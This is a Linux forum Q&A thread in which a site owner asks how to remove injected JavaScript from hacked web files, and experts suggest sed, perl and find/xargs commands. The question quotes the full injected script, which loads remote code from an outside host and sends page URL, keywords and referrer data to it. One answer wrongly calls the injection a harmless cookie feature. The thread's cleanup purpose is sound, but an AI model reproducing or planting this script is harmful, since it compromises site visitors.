Solved

Remove a very long string from all files in Linux

Posted on 2016-11-10
6
112 Views
Last Modified: 2016-11-11
Dear Experts.

One of my friends has a website which apparently was hacked and a certain very very (VERY) long function was injected into many of his files.
While I can rather easily detect the files with said function, I do need help with an automated cleanup

I had the following idea.... All the files has the following string inside:
<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://freedomfitnessandworkout.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'G91825' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>

when I nano the file, it all appears in one line, meaning I could probably somehow use grep to find the line number and ten somehow tell the system to remove said line from the file

Any idea how I'd go about doing such a thing?
0
Comment
Question by:David Sankovsky
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
6 Comments
 
LVL 62

Expert Comment

by:gheist
ID: 41882333
Restore from backup and never ever let webserver modify content?
0
 
LVL 29

Accepted Solution

by:
serialband earned 500 total points
ID: 41882680
If you don't want to spend time restoring, or if you don't have a backup, you could try sed.
sed '/pattern/d'  Matching_files*
The above command matches the pattern and deletes the entire line.

Assuming all lines have the link, you match this will match the string and delete the entire line.  This outputs to stdout:
sed "/http:\/\/freedomfitnessandworkout.com\/js\/jquery.min.php/d'  Matching_files
To send it to another file
sed "/http:\/\/freedomfitnessandworkout.com\/js\/jquery.min.php/d'  Matching_file > new_file


If you want to do it inline and edit and replace the file, you add the inline option:
sed -i "/http:\/\/freedomfitnessandworkout.com\/js\/jquery.min.php/d'  Matching_files
0
 
LVL 78

Expert Comment

by:arnold
ID: 41882862
Sed -I is a better approach compared to the /d since the string might not be the dole item on the line.

perl -pi.bak -e '/pattern/replacementofany/g;' files
The -I.bal will create a backup file for each file that is modified.
The /g tells it to replace all instances of the string that might exist in the same line.
0
Windows Server 2016: All you need to know

Learn about Hyper-V features that increase functionality and usability of Microsoft Windows Server 2016. Also, throughout this eBook, you’ll find some basic PowerShell examples that will help you leverage the scripts in your environments!

 
LVL 29

Expert Comment

by:serialband
ID: 41883250
@arnold
/d  is meant to delete the whole line if a pattern is matched, and that fits the question.  He's not trying to replace items, just delete the line.  You also talk about sed and used perl for your example.
0
 
LVL 78

Expert Comment

by:arnold
ID: 41883286
Serialband, I said that the sed -i was a better option versus /d
Verifying that the pattern is really in a single line,
The perl command line was provided as yet another option that does the same thing as the sed -I.bak if not will also create a bak file ..

To replace a pattern......

The entry seems to be a coldfusion object, might have had the person modified the template to add the above function to their site?
Seems like a cookie setting function.
I.e, the person attempts to make their site more user customizable...... So it requires cookies to maintain reference to the user/settings....
0
 
LVL 7

Author Closing Comment

by:David Sankovsky
ID: 41883740
Well, the SED command was almost perfect, you all however missed my main question, how would I go around sending all the matched file to whatever cleaning tool I chose (sed, perl, or whatever)

I eventually used "find" to make sure I don't accidently send folders into SED and then used XARGS to send all files in the web root directory to sed.

Thanks for all your help.
0

Featured Post

Technology Partners: We Want Your Opinion!

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

Title # Comments Views Activity
Nagios 4.0.8 ack_no_sticky=1 not working 7 20
Samba Question 11 138
Unix Help with:  mailx -s 17 65
Remote ARP query 1 6
If you have a server on collocation with the super-fast CPU, that doesn't mean that you get it running at full power. Here is a preamble. When doing inventory of Linux servers, that I'm administering, I've found that some of them are running on l…
I. Introduction There's an interesting discussion going on now in an Experts Exchange Group — Attachments with no extension (http://www.experts-exchange.com/discussions/210281/Attachments-with-no-extension.html). This reminded me of questions tha…
Learn how to get help with Linux/Unix bash shell commands. Use help to read help documents for built in bash shell commands.: Use man to interface with the online reference manuals for shell commands.: Use man to search man pages for unknown command…
Get a first impression of how PRTG looks and learn how it works.   This video is a short introduction to PRTG, as an initial overview or as a quick start for new PRTG users.
Suggested Courses

752 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question